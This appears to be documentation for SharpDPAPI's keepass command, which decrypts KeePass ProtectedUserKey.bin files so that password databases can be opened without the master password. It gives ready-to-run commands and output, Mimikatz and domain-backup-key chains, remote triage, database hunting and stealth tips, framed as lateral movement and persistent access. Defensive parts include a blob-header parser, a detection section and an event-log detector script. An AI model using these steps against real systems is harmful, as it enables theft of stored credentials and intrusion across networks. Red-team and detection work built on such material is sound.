
Overview

The keepass command searches for and decrypts KeePass ProtectedUserKey.bin files. These files contain DPAPI-protected key material used by KeePass to encrypt password databases, providing access to potentially hundreds of stored credentials.
KeePass can use Windows DPAPI to protect its master key file. Decrypting this file allows you to open KeePass databases without knowing the master password.

Basic Usage

# Decrypt with CryptUnprotectData (unprivileged)
SharpDPAPI.exe keepass /unprotect

# Decrypt with domain backup key
SharpDPAPI.exe keepass /pvk:key.pvk

# Decrypt with masterkey mappings
SharpDPAPI.exe keepass {GUID1}:SHA1 {GUID2}:SHA1

# Target specific ProtectedUserKey.bin file
SharpDPAPI.exe keepass /target:C:\Path\To\ProtectedUserKey.bin /unprotect

Command Arguments

Decryption Methods

  • CryptUnprotectData
  • Domain Backup Key
  • Masterkey Mappings
  • User Credentials

CryptUnprotectData:
# Use Windows API for decryption (unprivileged)
SharpDPAPI.exe keepass /unprotect
This method works without needing masterkeys if run from the user context that created the protected key file. No LSASS access required!

Targeting Options

Argument          Description
/target:FILE      Target a specific ProtectedUserKey.bin file
/target:FOLDER    Target a folder containing KeePass key files
/server:SERVER    Triage a remote server (requires admin access + pvk/password)

When using /target with a file, you must provide either /unprotect or {GUID}:SHA1 masterkey mappings. When using /target with a folder and /pvk, the folder must contain the DPAPI masterkeys.

Execution Context

  • Elevated
  • Unelevated

Elevated, i.e. when run with administrative privileges:
  • Triages all users on the system
  • Searches all user profiles for KeePass key files
  • Maximum key recovery

Example: Using /unprotect

SharpDPAPI.exe keepass /unprotect
Output:
[*] Action: KeePass Triage

[*] Using CryptUnprotectData() for decryption.

[*] Triaging KeePass ProtectedUserKey.bin files for current user

    File             : C:\Users\harmj0y\AppData\Roaming\KeePass\ProtectedUserKey.bin
    Accessed         : 3/1/2021 1:38:22 PM
    Modified         : 1/4/2021 5:49:49 PM
    guidMasterKey    : {dab90445-0a08-4b27-9110-b75d4a7894d0}
    size             : 210
    flags            : 0x0
    algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
    description      :
    Key Bytes        : 39 2E 63 EF 0E 37 E8 5C 34 ...


SharpDPAPI completed in 00:00:00.0566660
Save the Key Bytes output - these can be used with the modified KeePass version from KeeThief to open password databases.

Using Decrypted Key Bytes

Once you have the decrypted key bytes, you can use them to open KeePass databases:

1. Obtain Decrypted Key

SharpDPAPI.exe keepass /unprotect
# Save the "Key Bytes" output

2. Get Modified KeePass

Download the modified KeePass from KeeThief. This version accepts raw key bytes instead of a master password.

3. Open Database

Use the decrypted key bytes with the modified KeePass to open the user’s password database without knowing their master password.

KeePass Protected Key File Location

Default Location:
%APPDATA%\KeePass\ProtectedUserKey.bin
Alternative Locations:
  • Custom KeePass configuration directories
  • Portable KeePass installations
  • Network/shared KeePass configurations

How KeePass DPAPI Protection Works

1. User Enables Protection

KeePass offers a “User account” protection option which uses Windows DPAPI.

2. Key Material Encryption

KeePass encrypts the master key material with the user’s DPAPI masterkey.

3. Protected Key Saved

The encrypted key is saved to ProtectedUserKey.bin in the KeePass profile.

4. Automatic Unlock

When KeePass runs, it uses CryptUnprotectData() to automatically decrypt the key.

This protection binds the KeePass database to the Windows user account. If the user logs in, KeePass can open automatically without prompting for a password.
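The fields SharpDPAPI prints for a ProtectedUserKey.bin (guidMasterKey, flags, description, algHash/algCrypt) all come from the DPAPI blob header that step 3 writes to disk. The parser below is an added triage example, not SharpDPAPI's code: it walks that header to report which masterkey GUID and algorithms a copied file depends on without decrypting anything; the helper names are mine, and the sample blob it builds is constructed filler laid out in the real format, reusing the GUID from the example output above.

```python
import struct
import uuid

# Added triage helper (not SharpDPAPI's code): walk the DPAPI blob header of a
# ProtectedUserKey.bin and report the masterkey GUID, flags and algorithm ids.
# Only the lengths of the encrypted fields are reported; nothing is decrypted.
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CALG = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256", 0x8004: "CALG_SHA", 0x800E: "CALG_SHA_512"}


def _u32(b, off):
    return struct.unpack_from("<I", b, off)[0], off + 4


def _lenprefixed(b, off):            # u32 length followed by that many bytes
    n, off = _u32(b, off)
    return b[off:off + n], off + n


def describe_dpapi_blob(blob: bytes) -> dict:
    """Field order: version, provider GUID, masterkey version, masterkey GUID, flags,
    description, algCrypt(+key bits), salt, HMAC key, algHash(+bits), HMAC2 key, data, sign."""
    version, off = _u32(blob, 0)
    provider = uuid.UUID(bytes_le=blob[off:off + 16]); off += 16
    if version != 1 or provider != DPAPI_PROVIDER:
        raise ValueError("not a DPAPI blob")
    _, off = _u32(blob, off)                   # masterkey version
    mk = uuid.UUID(bytes_le=blob[off:off + 16]); off += 16
    flags, off = _u32(blob, off)
    desc, off = _lenprefixed(blob, off)        # UTF-16LE, NUL-terminated
    alg_crypt, off = _u32(blob, off); _, off = _u32(blob, off)
    salt, off = _lenprefixed(blob, off)
    _, off = _lenprefixed(blob, off)           # legacy HMAC key
    alg_hash, off = _u32(blob, off); _, off = _u32(blob, off)
    _, off = _lenprefixed(blob, off)           # HMAC2 key
    data, off = _lenprefixed(blob, off)
    sign, off = _lenprefixed(blob, off)
    return {"guidMasterKey": "{%s}" % mk, "flags": flags,
            "description": desc.decode("utf-16-le").rstrip("\x00"),
            "algHash": "%d (%s)" % (alg_hash, CALG.get(alg_hash, "?")),
            "algCrypt": "%d (%s)" % (alg_crypt, CALG.get(alg_crypt, "?")),
            "saltLen": len(salt), "dataLen": len(data), "signLen": len(sign),
            "size": len(blob), "trailing": len(blob) - off}


def build_sample_blob(mk_guid: str) -> bytes:
    """Constructed sample in the real layout; the 'ciphertext' is filler, not a real key."""
    lp = lambda b: struct.pack("<I", len(b)) + b
    return (struct.pack("<I", 1) + DPAPI_PROVIDER.bytes_le + struct.pack("<I", 1)
            + uuid.UUID(mk_guid).bytes_le + struct.pack("<I", 0) + lp("\x00".encode("utf-16-le"))
            + struct.pack("<II", 0x6603, 192) + lp(b"\x11" * 16) + lp(b"")
            + struct.pack("<II", 0x8004, 160) + lp(b"") + lp(b"\x39\x2e\x63\xef" * 6) + lp(b"\x22" * 20))
```

A non-zero `trailing` value or a provider GUID mismatch means the file is not a plain DPAPI blob and should not be treated as one.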

Common Scenarios

After obtaining domain admin and the backup key:

# 1. Retrieve backup key
SharpDPAPI.exe backupkey /file:key.pvk

# 2. Decrypt KeePass keys locally
SharpDPAPI.exe keepass /pvk:key.pvk

# 3. Decrypt on remote systems
SharpDPAPI.exe keepass /pvk:key.pvk /server:admin-workstation.domain.com

Extract masterkeys and decrypt KeePass key files:

# 1. In Mimikatz
# mimikatz# privilege::debug
# mimikatz# sekurlsa::dpapi

# 2. Run SharpDPAPI with extracted masterkeys
SharpDPAPI.exe keepass {dab90445-0a08-4b27-9110-b75d4a7894d0}:C23AF7432EB513717AA...

Analyzing a copied KeePass configuration:

# Target specific file with backup key
SharpDPAPI.exe keepass /target:C:\Evidence\ProtectedUserKey.bin /pvk:key.pvk

# With masterkey mappings
SharpDPAPI.exe keepass /target:C:\Evidence\ProtectedUserKey.bin {GUID}:SHA1

Finding KeePass Databases

After decrypting the protected key, locate the KeePass databases.

Common Locations:
%USERPROFILE%\Documents\*.kdbx
%USERPROFILE%\Desktop\*.kdbx
%USERPROFILE%\KeePass\*.kdbx
Network shares
Cloud storage (OneDrive, Dropbox, etc.)

Search for databases:
# PowerShell
Get-ChildItem -Path C:\Users\ -Recurse -Filter *.kdbx -ErrorAction SilentlyContinue

# CMD
dir C:\Users\*.kdbx /s

Detection Considerations

Host-Based Indicators:
  • Reads of the ProtectedUserKey.bin file
  • Non-KeePass processes accessing KeePass configuration
  • Enumeration of KeePass directories
  • Access to .kdbx database files

Defensive Monitoring:
  • Monitor access to %APPDATA%\KeePass\ProtectedUserKey.bin
  • Alert on ProtectedUserKey.bin access by non-KeePass processes
  • Track .kdbx file access patterns
  • Detect bulk KeePass configuration enumeration
  • Monitor for LSASS access (masterkey extraction is the fallback when /unprotect is not used)

Event Log Indicators:
Event ID: 4663 (File Access)
Object Name: *\KeePass\ProtectedUserKey.bin
Object Name: *.kdbx
Process Name: Not KeePass.exe
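One way to turn the indicators above into detection logic, as an added example that is not part of SharpDPAPI or this page: it evaluates Security event 4663 records, here constructed in a simplified dict form, against the object-name and process-name conditions listed under Event Log Indicators and adds a bulk-enumeration rule on top. The host WS01, the user, the key file path and the process C:\Temp\update.exe in the sample are constructed values.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from fnmatch import fnmatchcase

# Added example (not from SharpDPAPI or its docs): apply the page's host-based
# indicators to Security event 4663 records in a simplified dict form.
# 4663 only fires for paths carrying a SACL with "Audit File System" enabled.
LEGIT_PROCESSES = {"keepass.exe"}              # pair with signer/hash checks in practice
SENSITIVE = ("*\\keepass\\protecteduserkey.bin", "*.kdbx")
ENUM_THRESHOLD = 3                             # distinct KeePass files per process ...
ENUM_WINDOW = timedelta(minutes=5)             # ... within this window => bulk enumeration


def is_sensitive(path: str) -> bool:
    return any(fnmatchcase(path.lower(), pat) for pat in SENSITIVE)


def analyze_4663(events):
    """Return one alert per sensitive access by a non-KeePass process, plus a
    bulk-enumeration alert when a process crosses ENUM_THRESHOLD distinct files."""
    alerts, seen = [], defaultdict(list)       # (host, process) -> [(time, path)]
    for ev in events:
        if ev["EventID"] != 4663 or not is_sensitive(ev["ObjectName"]):
            continue
        if ev["ProcessName"].rsplit("\\", 1)[-1].lower() in LEGIT_PROCESSES:
            continue
        alerts.append({"rule": "non-keepass-access", "host": ev["Computer"], "user": ev["SubjectUserName"],
                       "process": ev["ProcessName"], "object": ev["ObjectName"]})
        key = (ev["Computer"], ev["ProcessName"])
        seen[key].append((ev["TimeCreated"], ev["ObjectName"].lower()))
        recent = {p for t, p in seen[key] if ev["TimeCreated"] - t <= ENUM_WINDOW}
        if len(recent) == ENUM_THRESHOLD:      # fire once, when the threshold is crossed
            alerts.append({"rule": "bulk-keepass-enumeration", "host": ev["Computer"],
                           "process": ev["ProcessName"], "count": len(recent)})
    return alerts


# Constructed sample: KeePass reads its own key file (benign), then an unrelated
# process reads the key file and two databases within seconds.
T0 = datetime(2021, 3, 1, 13, 38, 22)
KEYFILE = "C:\\Users\\harmj0y\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin"


def _ev(secs, proc, obj):
    return {"EventID": 4663, "TimeCreated": T0 + timedelta(seconds=secs), "Computer": "WS01",
            "SubjectUserName": "harmj0y", "ProcessName": proc, "ObjectName": obj}


SAMPLE_EVENTS = [
    _ev(0, "C:\\Program Files\\KeePass Password Safe 2\\KeePass.exe", KEYFILE),
    _ev(40, "C:\\Temp\\update.exe", KEYFILE),
    _ev(45, "C:\\Temp\\update.exe", "C:\\Users\\harmj0y\\Documents\\work.kdbx"),
    _ev(50, "C:\\Temp\\update.exe", "C:\\Users\\harmj0y\\Desktop\\personal.kdbx"),
]
```

Matching on the process name alone is weak because any binary can be named KeePass.exe; in production, pair the allowlist with the image's signature or hash, and confirm the KeePass paths actually carry a SACL or 4663 will never be written.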

Why Target KeePass?

Credential Jackpot

Password managers contain hundreds or thousands of credentials

High-Value Targets

Often contains admin, service account, and critical system passwords

Lateral Movement

Provides credentials for multiple systems and services

Persistent Access

Credentials remain valid even after user password changes

Tips

  • Prefer /unprotect when running as the target user
  • Look for KeePass on administrator and privileged user workstations
  • After decrypting the key, search the entire system for .kdbx files
  • Check network shares and cloud storage for KeePass databases
  • Combine with file search to locate all password databases
  • Use /unprotect for a minimal detection footprint
  • Run without elevation when possible
  • Target specific files if locations are known
  • Redirect output to a file with /consoleoutfile
  • Avoid bulk enumeration if stealth is required

No KeePass files found:
  • The user may not use the KeePass protection feature
  • KeePass may use a master password instead of Windows protection
  • Check for portable KeePass installations
  • Look in non-standard configuration directories

Decryption fails with /unprotect:
  • Must run from the user context that created the protected key
  • Try using masterkeys or the backup key instead
  • Verify you’re running as the correct user
  • The file may be corrupted or in an invalid format

Can’t find KeePass database:
  • Search the entire file system for .kdbx files
  • Check network shares and mapped drives
  • Look in cloud storage sync folders
  • The user may keep the database on removable media

Additional Resources

KeeThief Project

Modified KeePass version and additional tools for KeePass credential extraction